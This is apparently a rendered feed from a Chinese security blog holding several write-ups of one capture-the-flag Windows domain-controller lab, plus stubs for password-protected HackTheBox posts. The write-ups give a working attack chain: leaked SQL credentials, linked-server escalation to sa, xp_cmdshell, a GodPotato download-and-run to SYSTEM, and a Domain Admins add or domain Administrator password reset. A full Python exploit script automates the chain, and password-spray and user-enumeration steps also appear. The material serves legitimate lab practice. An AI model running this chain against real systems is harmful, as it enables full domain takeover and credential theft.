[*] Starting service kiue.....
[!] Press help for extra shell commands                                                                                                                                            nt authority\system
[*] Process cmd.exe /c whoami & hostname finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 127.0.0.1.....
CASTLEVANIA
[*] Stopping service kiue.....
[*] Removing service kiue.....
[*] Removing file XWajdGZq.exe.....
(babydc-venv) ubuntu@VM-16-10-ubuntu:~$

成功获得shell

Administrator:aes256-cts-hmac-sha1-96:13e54f64708d675c0a54eb4b40e2ca21b2fcb3e6298969d741fc6e70a9367786
Administrator:aes128-cts-hmac-sha1-96:aafdd9e5c02b41dece2a83b2d9b4439c
Administrator:des-cbc-md5:80584683e63d5845

空白(土豆提权)

题目分析

靶机对外开放了 80、445、1433、25。80 口只有一个很简单的 IIS 默认站点，首页没有可利用逻辑，但站点目录里放了一个明文连接配置，直接给出 SQL 登录信息：

server=localhost;
user=wuwupor;
password=lovlyBaby
database=master

先用这组账号连接 SQL Server，可以看到当前登录只是 master 里的 guest，本身不是 sysadmin。问题的关键在 linked server。枚举 sys.servers 之后可以看到本机额外配置了两个 linked server：

SELECT name, product, provider, data_source, is_linked, is_remote_login_enabled
FROM sys.servers;

结果里有：

POO_CONFIG
POO_PUBLIC

继续直接在 linked server 上执行查询，能看到两个 linked server 的远端上下文完全不同：

EXEC ('SELECT @@SERVERNAME AS server_name,
             SYSTEM_USER   AS current_login,
             ORIGINAL_LOGIN() AS original_login,
             IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin') AT POO_CONFIG;

EXEC ('SELECT @@SERVERNAME AS server_name,
             SYSTEM_USER   AS current_login,
             ORIGINAL_LOGIN() AS original_login,
             IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin') AT POO_PUBLIC;

返回结果里：

POO_CONFIG -> current_login = poo_config, is_sysadmin = 0
POO_PUBLIC -> current_login = sa,         is_sysadmin = 1

到这里利用链已经很清楚了。外部只要持有 wuwupor / lovlyBaby，就能通过 POO_PUBLIC 借壳成 sa。

SQL 利用

确认配置项时还能看到 xp_cmdshell 已经开启：

SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'Ad Hoc Distributed Queries', 'clr enabled', 'remote access');

于是可以直接通过 POO_PUBLIC 执行系统命令：

EXEC ('EXEC xp_cmdshell ''whoami''') AT POO_PUBLIC;

返回身份是：

xmcve\sqlsvc

接着看权限：

EXEC ('EXEC xp_cmdshell ''whoami /priv''') AT POO_PUBLIC;

输出里最关键的一项是：

SeImpersonatePrivilege Enabled

这说明 sqlsvc 已经满足典型的本地提权条件，只差一条能把 SeImpersonatePrivilege 用起来的链。这里直接使用 GodPotato，它对 Windows Server 2019 可用。

系统提权

利用思路非常直接：

用 xp_cmdshell 下发 GodPotato.exe
让 GodPotato 以 SYSTEM 身份执行一条命令
把已知明文口令的 sqlsvc / Sql!2026 加进 Domain Admins
重新用 sqlsvc / Sql!2026 发起网络登录，直接拿管理员级远程会话

GodPotato 先用 whoami 验证时，返回结果里已经能看到：

CurrentUser: NT AUTHORITY\SYSTEM

然后执行：

net group "Domain Admins" sqlsvc /add /domain

命令成功后，重新使用 sqlsvc / Sql!2026 进行远程执行，就能拿到管理员级 shell。这里用 psexec 验证，返回结果是：

nt authority\system
CASTLEVANIA

成功拿到admin shell

Exp

import argparse
import contextlib
import functools
import http.server
import shutil
import socket
import socketserver
import subprocess
import sys
import threading
import time
from pathlib import Path

import pytds


def quote_sql(value: str) -> str:
    return value.replace("'", "''")


def get_local_ip_for_target(target_ip: str) -> str:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.connect((target_ip, 1433))
        return sock.getsockname()[0]
    finally:
        sock.close()


class QuietHandler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, fmt: str, *args) -> None:
        pass


class ThreadingHTTPServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
    daemon_threads = True
    allow_reuse_address = True


@contextlib.contextmanager
def serve_directory(directory: Path, host: str):
    handler = functools.partial(QuietHandler, directory=str(directory))
    server = ThreadingHTTPServer((host, 0), handler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        yield server.server_address[1]
    finally:
        server.shutdown()
        server.server_close()
        thread.join(timeout=1)


class MSSQLExploit:
    def __init__(self, server: str, user: str, password: str, database: str = "master", port: int = 1433):
        self.conn = pytds.connect(
            server=server,
            database=database,
            user=user,
            password=password,
            port=port,
            validate_host=False,
            use_tz=False,
            autocommit=True,
        )

    def close(self) -> None:
        self.conn.close()

    def run_query(self, query: str):
        cur = self.conn.cursor()
        cur.execute(query)
        if not cur.description:
            return []
        rows = cur.fetchall()
        columns = [c[0] for c in cur.description]
        return [dict(zip(columns, row)) for row in rows]

    def xp_cmdshell_via_public(self, command: str):
        query = f"EXEC ('EXEC xp_cmdshell ''{quote_sql(command)}''') AT POO_PUBLIC"
        return self.run_query(query)


def print_rows(title: str, rows) -> None:
    print(f"\n=== {title} ===")
    if not rows:
        print("(no rows)")
        return
    for row in rows:
        print(row)


def ensure_psexec() -> str:
    candidates = [
        shutil.which("psexec.py"),
        str(Path(sys.executable).with_name("psexec.py")),
        str(Path(sys.executable).resolve().parent.parent / "Scripts" / "psexec.py"),
    ]
    for candidate in candidates:
        if candidate and Path(candidate).exists():
            return candidate
    raise FileNotFoundError("psexec.py not found in PATH or next to the current Python installation.")


def main() -> int:
    parser = argparse.ArgumentParser(description="Exploit for codegate babydc.")
    parser.add_argument("--target", default="192.168.124.7")
    parser.add_argument("--sql-user", default="wuwupor")
    parser.add_argument("--sql-password", default="lovlyBaby")
    parser.add_argument("--domain", default="XMCVE")
    parser.add_argument("--pivot-user", default="sqlsvc")
    parser.add_argument("--pivot-password", default="Sql!2026")
    parser.add_argument("--command", default="cmd.exe", help="Command passed to psexec after sqlsvc becomes Domain Admin.")
    args = parser.parse_args()

    base_dir = Path(__file__).resolve().parent
    godpotato = base_dir / "GodPotato.exe"
    if not godpotato.exists():
        raise FileNotFoundError(f"Missing helper: {godpotato}")

    target_ip = args.target
    local_ip = get_local_ip_for_target(target_ip)
    print(f"[+] target: {target_ip}")
    print(f"[+] local callback IP: {local_ip}")

    sql = MSSQLExploit(target_ip, args.sql_user, args.sql_password)
    try:
        print_rows(
            "linked server context",
            sql.run_query(
                "EXEC ('SELECT @@SERVERNAME AS server_name, SYSTEM_USER AS current_login, "
                "IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin') AT POO_PUBLIC"
            ),
        )
        print_rows("xp_cmdshell identity", sql.xp_cmdshell_via_public("whoami /priv"))

        with serve_directory(base_dir, "0.0.0.0") as port:
            download_cmd = (
                'powershell -c "try {(New-Object Net.WebClient).DownloadFile('
                f"'http://{local_ip}:{port}/{godpotato.name}',"
                "'C:\\Windows\\Temp\\GodPotato.exe');"
                'Write-Output OK} catch { Write-Output $_.Exception.Message }"'
            )
            print_rows("download helper", sql.xp_cmdshell_via_public(download_cmd))
            print_rows(
                "helper presence",
                sql.xp_cmdshell_via_public(
                    'powershell -c "Get-Item \'C:\\Windows\\Temp\\GodPotato.exe\' | '
                    'Select-Object Name,Length | Format-List"'
                ),
            )

        add_group_cmd = (
            'C:\\Windows\\Temp\\GodPotato.exe -cmd '
            f'"cmd /c net group \\"Domain Admins\\" {args.pivot_user} /add /domain"'
        )
        print_rows("godpotato group add", sql.xp_cmdshell_via_public(add_group_cmd))
        time.sleep(2)
    finally:
        sql.close()

    psexec = ensure_psexec()
    user_spec = f"{args.domain}/{args.pivot_user}:{args.pivot_password}@{target_ip}"
    cmd = [sys.executable, psexec, user_spec, args.command]
    print(f"[+] launching psexec: {' '.join(cmd)}")
    return subprocess.call(cmd)


if __name__ == "__main__":
    raise SystemExit(main())

Wadding(土豆提权)

题面要求并不是提交在线环境里的字符串 flag，而是：

对镜像本地搭建并渗透，拿到 Administrator shell，提交 WP 到邮箱审核，通过后才给官方 flag

这台镜像里我已经拿到了 Administrator 远程执行权限，当前可复现的管理员 shell 证明如下：

xmcve\administrator
CASTLEVANIA

另外，镜像里还残留了一个被删除的本地 flag 文本，在回收站文件内容中可恢复出：

FLAG{XMCVE_Castlevania_Bloodlines_DA_Pwned}

但要说明，这个并不是题面承诺的“官方比赛 flag”，因为题面明确说了官方 flag 要在提交 WP 审核后才发放。

环境信息

题目给了本地 OVA：

D:\Install\Bloodstained.ova

导入后我把机器改成：

NIC1 = Host-Only
NIC2 = NAT

这样宿主机可以直接访问客机。

客机关键信息：

主机名：CASTLEVANIA
域名：XMCVE.local
Web：80/tcp
MSSQL：1433/tcp
LDAP / AD：389, 445, 88 ...

通过 Guest Additions 和网络探测确认到：

Host-only 网卡：169.254.212.20
NAT 网卡：10.0.3.15

攻击面梳理

首页只有一个静态维护页：

<h1>Employee Portal</h1>
<p>Under maintenance...</p>

看起来没什么内容，但离线查看 VMDK 后发现 inetpub\wwwroot 下除了 index.html 之外还有一个非常关键的文件：

C:\inetpub\wwwroot\poo_connection.txt

内容是明文 SQL 连接串：

server=localhost;
user=wuwupor;
password=lovlyBaby
database=master

这一条直接把 MSSQL 入口送出来了。

第一步：连接 MSSQL

用连接串登录 SQL Server：

wuwupor / lovlyBaby

登录成功，但当前账号不是 sysadmin：

select is_srvrolemember('sysadmin')

返回 0。

继续枚举时，发现 SQL Server 上配置了两个非常可疑的 linked server：

select name, product, provider, data_source,
       is_rpc_out_enabled, is_data_access_enabled
from sys.servers

结果里有：

POO_PUBLIC
POO_CONFIG

第二步：利用 linked server 提权到 SQL sysadmin

进一步验证这两个 linked server 的远端身份：

select * from openquery(POO_PUBLIC, 'select @@servername as srv, db_name() as db, system_user as su, user_name() as un')

srv = CASTLEVANIA
db  = master
su  = sa
un  = dbo

也就是说：

wuwupor -> POO_PUBLIC -> localhost 上的 sa/dbo

这就相当于把本来不具备 sysadmin 的账号，借 linked server 直接借成了 sa。

而且 xp_cmdshell 已经是开启状态：

exec ('exec master..sp_configure ''xp_cmdshell''') at POO_PUBLIC

第三步：拿到系统命令执行

通过 linked server 执行命令：

exec ('exec master..xp_cmdshell ''whoami''') at POO_PUBLIC

回显是：

xmcve\sqlsvc

也就是说当前操作系统命令执行身份是 SQL Server 服务账号 xmcve\sqlsvc。

继续查它的特权：

whoami /priv

可以看到：

SeImpersonatePrivilege        Enabled

所以标准的 Potato 链是可用的。

第四步：为什么 PrintSpoofer 不行

我最开始先试了 PrintSpoofer，但很快发现这台机器的 Spooler 是关着的，而且启动类型是 Disabled：

Get-Service Spooler
Status    : Stopped
StartType : Disabled

因此 PrintSpoofer 这条链虽然二进制能执行，但不会真正完成提权。

第五步：改用 GodPotato

由于系统是 Windows Server 2019，且 sqlsvc 拥有 SeImpersonatePrivilege，直接换成 GodPotato 即可。

我在宿主机开了一个临时 HTTP 服务，把 GodPotato-NET4.exe 投到客机，然后通过 SQL 执行：

C:\Windows\Temp\GodPotato-NET4.exe -cmd "cmd /c net user Administrator Xmctf2026Aa /domain"

GodPotato 的关键回显如下：

[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] Start Search System Token
[*] PID : 804 Token:0x800  User: NT AUTHORITY\SYSTEM
[*] Find System Token : True
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid ...
The command completed successfully.

这说明链条已经把 sqlsvc 抬到了 SYSTEM，并成功执行了我们给它的命令。

随后再查：

net user Administrator /domain

可以看到 Password last set 已经更新，说明域管理员密码确实被改掉了。

第六步：验证 Administrator shell

最后直接用新密码通过 impacket 的 wmiexec.py 验证远程管理员执行：

python wmiexec.py XMCVE/Administrator:Xmctf2026Aa@169.254.212.20 whoami
python wmiexec.py XMCVE/Administrator:Xmctf2026Aa@169.254.212.20 hostname

回显：

xmcve\administrator
CASTLEVANIA

这一步已经满足题目要求的：

拿到 Administrator shell

补充：本地 flag 文本的恢复

虽然官方 flag 要人工审核后发放，但镜像里其实残留了一个已经删除的本地 flag 文件线索。

在 Alucard 的 Recent 里有一个快捷方式：

C:\Users\Alucard\Recent\flag.lnk

它指向：

C:\Users\Administrator\Desktop\flag.txt

这个文件本身已经被删掉了，但在回收站目录中仍然留有内容文件：

$Recycle.Bin\S-1-5-21-...-500\$RIZ9PVX.txt

离线读这个文件，能恢复出：

FLAG{XMCVE_Castlevania_Bloodlines_DA_Pwned}

再次强调，这更像是镜像内的本地证明文本，不一定等于比赛平台最后发放的正式 flag。

Exploit

完整利用脚本放在：

exploit/solve.py

脚本做的事情是：

在宿主机开启临时 HTTP 服务。
用 wuwupor / lovlyBaby 登录 MSSQL。
通过 linked server POO_PUBLIC 执行 xp_cmdshell。
向客机投递并运行 GodPotato-NET4.exe。
把 Administrator 的域密码改成已知值。
调用 wmiexec.py 验证 Administrator shell。

运行方式

在当前主机上直接执行：

python C:\AI知识库\Test\polarisctf2026\tasks\Web\16-BabyDC\exploit\solve.py

小结

这题的核心链非常清晰：

离线盘分析 -> webroot 明文连接串 -> MSSQL 登录 ->
linked server 映射到 sa -> xp_cmdshell ->
GodPotato(SeImpersonate) -> SYSTEM ->
重置 Administrator 密码 -> Administrator shell

其中最关键的两个点是：

poo_connection.txt 泄露了 SQL 凭据。
POO_PUBLIC 这个 linked server 把普通 SQL 登录桥接成了 sa。

有了这两步，后面的 GodPotato 只是把 “系统命令执行” 再抬成 “管理员控制整台 DC”。

GDEX(土豆提权)

1. 题目环境与边界

工具：VirtualBox 7.2.0、PowerShell、ipconfig

目的：确认靶机网络、攻击边界和目标身份，确保后续动作只落在靶机 192.168.56.101 上，不对宿主机做攻击。

关键命令：

ipconfig

关键结果：

宿主机 VirtualBox Host-Only 网卡为 192.168.56.1/24。
靶机最终恢复到 Host-Only 网络，目标地址确定为 192.168.56.101。
靶机身份后续通过 LDAP/SQL 进一步确认：
- 主机名：CASTLEVANIA
- 域名：XMCVE.local
- 系统：Windows Server 2019
- 角色：域控

说明：

整个过程只打 192.168.56.101。
宿主机 192.168.56.1 仅在后期作为 HTTP 文件服务端，给靶机下发工具文件，不作为攻击目标。

2. 初始信息搜集

2.1 Web 探测

工具：web_probe.py

目的：确认 Web 面是否存在可直接利用的入口、虚拟主机、隐藏路径或调试页面。

关键命令：

import argparse
from typing import Iterable

import requests


DEFAULT_HOSTS = [
    "192.168.56.101",
    "castlevania",
    "castlevania.xmcve.local",
    "xmcve.local",
    "portal.xmcve.local",
    "intranet.xmcve.local",
    "employee.xmcve.local",
    "support.xmcve.local",
    "sql.xmcve.local",
    "dev.xmcve.local",
    "test.xmcve.local",
]

DEFAULT_PATHS = [
    "/",
    "/index.html",
    "/portal/",
    "/employee/",
    "/support/",
    "/login/",
    "/admin/",
    "/db/",
    "/sql/",
    "/backup/",
]


def probe(base_url: str, hostnames: Iterable[str], paths: Iterable[str], timeout: int) -> None:
    session = requests.Session()
    session.trust_env = False
    for host in hostnames:
        for path in paths:
            url = f"{base_url.rstrip('/')}{path}"
            try:
                response = session.get(
                    url,
                    headers={"Host": host},
                    timeout=timeout,
                    allow_redirects=False,
                    proxies={"http": None, "https": None},
                )
                server = response.headers.get("Server", "")
                print(
                    f"{response.status_code}\t{len(response.text)}\tHost={host}\tPath={path}\tServer={server}"
                )
            except Exception as exc:
                print(f"ERR\tHost={host}\tPath={path}\t{exc}")


def main() -> None:
    parser = argparse.ArgumentParser(description="HTTP vhost and path probing against a single target")
    parser.add_argument("--url", default="http://192.168.56.101", help="Base URL")
    parser.add_argument("--timeout", type=int, default=4, help="Request timeout")
    parser.add_argument("--hosts", nargs="*", default=DEFAULT_HOSTS, help="Host header candidates")
    parser.add_argument("--paths", nargs="*", default=DEFAULT_PATHS, help="Paths to probe")
    args = parser.parse_args()
    probe(args.url, args.hosts, args.paths, args.timeout)


if __name__ == "__main__":
    main()

python .\web_probe.py --url http://192.168.56.101

关键结果：

80/tcp 为 IIS 10.0。
/ 与 /index.html 返回静态页面，内容为：
- CASTLEVANIA Portal
- Employee Portal
- Under maintenance...
OPTIONS 允许的方法为：OPTIONS, TRACE, GET, HEAD, POST

结论：

Web 面非常薄，没有直接给出认证入口或现成 RCE。
站点更像“占位页面 + 后端另有依赖”，应继续往 IIS 配置、连接串和数据库方向挖。

2.2 LDAP RootDSE 匿名枚举

工具：ldap_rootdse.py

目的：确认域信息、LDAP 命名上下文、DC 身份。

关键命令：

$env:PYTHONPATH='f:\aaa\新建文件夹\aaaaaaaaaasentou\.deps'
python .\ldap_rootdse.py

关键结果：

[+] default_naming_context: ['DC=XMCVE,DC=local']
[+] dns_host_name: ['CASTLEVANIA.XMCVE.local']
[+] ldap_service_name: ['XMCVE.local:castlevania$@XMCVE.LOCAL']

结论：

目标是 XMCVE.local 域内 DC。
后续所有 LDAP/Kerberos/MSSQL 利用都可以围绕这个域来展开。

2.3 Kerberos 用户枚举

工具：kerb_user_enum.py

目的：枚举有效域用户，确认后续喷洒、凭据猜解和服务账号方向。

关键命令：

$env:PYTHONPATH='f:\aaa\新建文件夹\aaaaaaaaaasentou\.deps'
python .\kerb_user_enum.py --no-asrep

关键结果：

VALID   Administrator   25
VALID   Alucard         25
VALID   support         25
VALID   sqlsvc          25
INVALID Guest           18
INVALID krbtgt          18

结论：

有效用户至少包括：Administrator、Alucard、support、sqlsvc。
sqlsvc 极像 MSSQL 服务账号，优先级最高。

2.4 低噪声 LDAP 密码喷洒

工具：password_spray_ldap.py

目的：对已经确定的少量有效用户做极小范围喷洒，看看是否存在弱口令复用。

关键命令：

$env:PYTHONPATH='f:\aaa\新建文件夹\aaaaaaaaaasentou\.deps'
python .\password_spray_ldap.py

关键结果：

对 Alucard / sqlsvc / support / Administrator 的小范围喷洒没有命中。

结论：

该题不走“简单弱口令”路线。
后续更应该关注配置泄露、服务账号、数据库与离线取证。

2.5 初始开放端口结论

工具：端口探测

目的：建立完整攻击面。

关键结果：

53/tcp DNS
80/tcp IIS 10.0
88/tcp Kerberos
135/tcp RPC
139/tcp NetBIOS
389/tcp LDAP
445/tcp SMB
464/tcp Kerberos kpasswd
593/tcp RPC over HTTP
636/tcp LDAPS
1433/tcp MSSQL
9389/tcp AD Web Services
49666/tcp``49667/tcp``49669/tcp``49670/tcp 高位 RPC

结论：

这是一台“域控 + IIS + MSSQL”混合角色机器。
真正可打的重心是 1433/tcp，而不是薄弱的静态 Web 页面。

3. 离线取证与关键线索

工具：VirtualBox 磁盘克隆、Python + dissect.target、LnkParse3

目的：Web 正面几乎没有入口时，直接离线分析系统盘，找明文凭据、服务配置、Recent 痕迹和管理员操作记录。

关键思路：

先对靶机系统盘做克隆，得到 bloodstained_clone.vhd。
用 Python + dissect.target 打开克隆盘，重点查看：
- C:\inetpub\wwwroot
- C:\Program Files\Microsoft SQL Server\...\ERRORLOG
- C:\Scripts
- C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent
- ConsoleHost_history.txt
用 LnkParse3 解析 Recent 目录下的 .lnk，恢复已删除文件曾经存在的路径。

关键发现 1：Web 根目录连接串泄露

文件：C:\inetpub\wwwroot\poo_connection.txt
内容关键信息：

server=localhost;
user=wuwupor;
password=lovlyBaby
database=master

结论：

直接拿到 MSSQL 明文凭据 wuwupor / lovlyBaby。
这是整条链路的真正起点。

关键发现 2：SQL 服务账号

从 SQL ERRORLOG 可确认 SQL Server 服务账号为 XMCVE\sqlsvc。

结论：

说明之后 xp_cmdshell 很可能会以 sqlsvc 身份执行系统命令。

关键发现 3：linked server

SQL 内存在两个 linked server：
- POO_CONFIG
- POO_PUBLIC

结论：

这类配置在 CTF 里通常不是装饰，很可能就是从低权限 SQL 登录横向到高权限上下文的关键。

关键发现 4：辅助痕迹

MailBot.ps1 里出现过一组像比赛用户名/密码的字符串：
- pr3d1ct / yuyan_crypto
- p2zhh / p2zhh_web
- aomr / aomr_reverse
- berial / berial_pwn
Recent 和 PowerShell history 指向过一批已删除文件：
- dcsync.sh
- golden_ticket.sh
- SAM.save
- SECURITY.save
- SYSTEM.save
- fix_linked_server.ps1

结论：

这些痕迹说明题目设计方向就是“SQL/AD abuse -> 高权限控制”。
但它们只是辅助线索，不是最终利用点。

4. MSSQL 利用链

工具：invoke_sql_query.ps1、invoke_xpcmd.ps1

目的：用已知 SQL 凭据登录数据库，判断权限边界，利用 linked server 完成 sysadmin 提权，并开启 xp_cmdshell。

4.1 连接 MSSQL 并确认初始权限

关键命令：

& .\invoke_sql_query.ps1 -Query "select @@servername as server_name, SYSTEM_USER as login_name, USER_NAME() as db_user, IS_SRVROLEMEMBER('sysadmin') as is_sysadmin"

关键结果：

当前 SQL 登录为 wuwupor
当前数据库用户最初只是 guest
初始并不是 sysadmin

说明：

这意味着明文连接串本身还不够，需要继续从 SQL 配置里提权。

4.2 枚举 linked server

关键命令：

& .\invoke_sql_query.ps1 -Query "select server_id, name, data_source, is_linked, is_rpc_out_enabled, is_data_access_enabled from sys.servers order by server_id"

关键结果：

POO_CONFIG -> localhost
POO_PUBLIC -> localhost
两者都开启了 RPC OUT，并允许数据访问

结论：

这两个 linked server 可以直接作为横向执行入口测试。

4.3 验证 linked server 执行身份

关键命令：

& .\invoke_sql_query.ps1 -Query "EXEC ('select @@servername as server_name, SYSTEM_USER as login_name, USER_NAME() as db_user') AT [POO_PUBLIC]" -ConnectionTimeout 20

关键结果：

server_name  login_name  db_user
CASTLEVANIA  sa          dbo

补充观察：

POO_CONFIG 执行时只是普通低权限上下文。
真正有价值的是 POO_PUBLIC，它把当前请求映射到了 sa / dbo。

结论：

这里已经找到了从普通 SQL 登录跳到高权限 SQL 上下文的关键跳板。

4.4 把 `wuwupor` 提成 `sysadmin`

关键命令：

& .\invoke_sql_query.ps1 -Query "EXEC ('EXEC master..sp_addsrvrolemember ''wuwupor'', ''sysadmin''') AT [POO_PUBLIC]" -ConnectionTimeout 20

随后复查：

& .\invoke_sql_query.ps1 -Query "select SYSTEM_USER as login_name, USER_NAME() as db_user, IS_SRVROLEMEMBER('sysadmin') as is_sysadmin" -ConnectionTimeout 20

关键结果：

wuwupor 变为 dbo
IS_SRVROLEMEMBER('sysadmin') = 1

结论：

至此，SQL 低权限登录被稳定提到了 sysadmin。

4.5 开启 `xp_cmdshell` 并验证系统命令上下文

关键命令：

& .\invoke_sql_query.ps1 -Query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;" -ConnectionTimeout 20
& .\invoke_xpcmd.ps1 -Command 'whoami' -ConnectionTimeout 20

关键结果：

xmcve\sqlsvc

结论：

SQL Server 系统命令是以 XMCVE\sqlsvc 身份执行。
这和离线取证得到的 SQL 服务账号完全对上。

5. 从 `sqlsvc` 到 `SYSTEM`

工具：serve_blob_tcp.ps1、invoke_xpcmd.ps1、stage_godpotato.ps1、invoke_godpotato_system.ps1

目的：从 sqlsvc 进一步提到本机 SYSTEM。

为什么选 GodPotato：

whoami /priv 显示 sqlsvc 拥有 SeImpersonatePrivilege
Spooler 服务未运行，所以没有优先走 PrintSpoofer
这类环境更适合直接走 GodPotato

5.1 为什么最终没有采用“源码远程编译”

尝试过的辅助脚本：

stage_godpotato.ps1
invoke_godpotato_system.ps1

尝试思路：

把 GodPotato 源码下发到靶机 %TEMP%\gp
用靶机自带 csc.exe 编译

结果：

靶机编译器较老，编译 GodPotato 源码时报错，例如：

error CS1056: Unexpected character '$'

结论：

“源码下发 + 靶机本地编译”不是最终稳定方案。
真正稳定的方案是直接下发编译好的二进制。

5.2 用内存 HTTP 服务给靶机下发 GodPotato

工具：serve_blob_tcp.ps1

目的：让宿主机只在内存里代理 GodPotato 二进制，避免文件直接落盘在本机被清理。

关键命令：

powershell -ExecutionPolicy Bypass -File .\serve_blob_tcp.ps1 -Bind 192.168.56.1 -Port 8001

关键结果：

宿主机在 http://192.168.56.1:8001/gp.exe 提供 GodPotato 二进制
靶机可以通过 Host-Only 网络直接下载

5.3 通过 `xp_cmdshell` 下载二进制到靶机

关键命令：

& .\invoke_xpcmd.ps1 -Command 'powershell -NoProfile -Command "Invoke-WebRequest -UseBasicParsing http://192.168.56.1:8001/gp.exe -OutFile $env:TEMP\svcmon.exe; Get-Item $env:TEMP\svcmon.exe | Select-Object Name,Length | Format-Table -AutoSize"' -ConnectionTimeout 20

关键结果：

%TEMP%\svcmon.exe 成功落到靶机
文件长度为 57344 字节

5.4 触发 GodPotato 提权并验证 `SYSTEM`

关键命令：

& .\invoke_xpcmd.ps1 -Command '%TEMP%\svcmon.exe -cmd "cmd /c whoami /all > C:\Users\sqlsvc\AppData\Local\Temp\gpwho.txt"' -ConnectionTimeout 20
& .\invoke_xpcmd.ps1 -Command 'cmd /c type C:\Users\sqlsvc\AppData\Local\Temp\gpwho.txt' -ConnectionTimeout 20

关键结果：

User Name           SID
=================== ========
nt authority\system S-1-5-18

同时 GodPotato 过程日志里还能看到：

[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3896

结论：

sqlsvc 已经被稳定提升为 SYSTEM。

6. 从 `SYSTEM` 到 `Administrator`

工具：invoke_xpcmd.ps1、PowerShell WMI

目的：利用 SYSTEM 权限直接控制域内 Administrator。

6.1 用 `SYSTEM` 重置域内 `Administrator` 密码

关键命令：

& .\invoke_xpcmd.ps1 -Command '%TEMP%\svcmon.exe -cmd "cmd /c net user Administrator Xmcve#2026! /domain > C:\Users\sqlsvc\AppData\Local\Temp\setadmin.txt 2>&1"' -ConnectionTimeout 20
& .\invoke_xpcmd.ps1 -Command 'cmd /c type C:\Users\sqlsvc\AppData\Local\Temp\setadmin.txt' -ConnectionTimeout 20

关键结果：

The command completed successfully.

结论：

域内 Administrator 密码已经被成功改为 Xmcve#2026!。

6.2 用 WMI 验证管理员上下文

目的：证明这组新凭据真的能以管理员身份在远端创建进程，而不是只停留在“理论上应当可用”。

关键命令：

$sec = ConvertTo-SecureString 'Xmcve#2026!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('XMCVE\Administrator', $sec)
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c whoami > C:\inetpub\wwwroot\adminshell.txt' -ComputerName 192.168.56.101 -Credential $cred
(Invoke-WebRequest -UseBasicParsing -Uri 'http://192.168.56.101/adminshell.txt').Content

关键结果：

xmcve\administrator

结论：

这里已经拿到了经过现场验证的 Administrator 远程命令执行。
这一步本身就已经足以证明管理员权限被完全接管。

7. 最终交互 shell 落地

工具：Impacket psexec.py

目的：把已经验证可用的 Administrator 凭据落成真正交互 shell。

前提：

已知管理员凭据：XMCVE\Administrator / Xmcve#2026!
目标 445/tcp 开放
前面已经通过 WMI 验证过该管理员凭据真实有效

关键命令：

psexec.py XMCVE/Administrator:'Xmcve#2026!'@192.168.56.101 cmd.exe

说明：

这一步就是把“已验证的 Administrator 远程命令执行”进一步落成交互式 shell。
如果提交时更强调“已现场证明”，那么上一节的 adminshell.txt -> xmcve\administrator 已经是强证据。
如果提交时更强调“完整 shell 终点”，则这一条 psexec.py 就是最后一步。

8. 总结与漏洞点

整条利用链可以概括为：

Web 面本身很薄，但离线分析 Web 根目录发现数据库连接串泄露，直接拿到 MSSQL 明文凭据 wuwupor / lovlyBaby。
用该凭据登录 MSSQL 后发现 linked server POO_PUBLIC 映射到了 sa / dbo，从而把 wuwupor 横向提到 sysadmin。
开启 xp_cmdshell 后，系统命令以 XMCVE\sqlsvc 身份执行。
sqlsvc 拥有 SeImpersonatePrivilege，借助 GodPotato 直接提到 NT AUTHORITY\SYSTEM。
以 SYSTEM 重置域内 Administrator 密码，再用新密码完成管理员远程命令执行与最终交互 shell 落地。

最终漏洞点有三处：

漏洞点 1：Web 根目录泄露 SQL 明文连接凭据

C:\inetpub\wwwroot\poo_connection.txt
暴露了 wuwupor / lovlyBaby

漏洞点 2：MSSQL linked server `POO_PUBLIC` 映射到 `sa`

低权限 SQL 登录可以通过 linked server 直接在远端以上下文 sa / dbo 执行语句
最终导致 sysadmin 提权

漏洞点 3：SQL 服务账号 `sqlsvc` 拥有 `SeImpersonatePrivilege`

xp_cmdshell 落地为 sqlsvc
sqlsvc 可借 GodPotato 提权为 SYSTEM
SYSTEM 可直接控制域内 Administrator

至此，完整链路为：

信息搜集
-> 离线取证拿到 SQL 连接串
-> MSSQL 登录
-> linked server 映射到 sa
-> 提升 wuwupor 为 sysadmin
-> 开启 xp_cmdshell
-> 命令执行落到 sqlsvc
-> GodPotato 提到 SYSTEM
-> SYSTEM 重置 Administrator 密码
-> Administrator 远程命令执行
-> psexec.py 落交互 shell

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/myself-machine/castlevania-unexpected/

HTB-Ascension

呼啸山庄 — Thu, 26 Mar 2026 00:00:00 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/ascension/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/ascension/

HTB-Kaiju

呼啸山庄 — Tue, 24 Mar 2026 00:00:00 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/kaiju/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/kaiju/

HTB-Unintended

呼啸山庄 — Mon, 23 Mar 2026 00:00:00 GMT

This article is password-protected. Please visit https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/unintended/ to unlock and view the full content.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hackthebox-prolabs/unintended/

HTB-Zephyr

呼啸山庄 — Sun, 22 Mar 2026 00:00:00 GMT

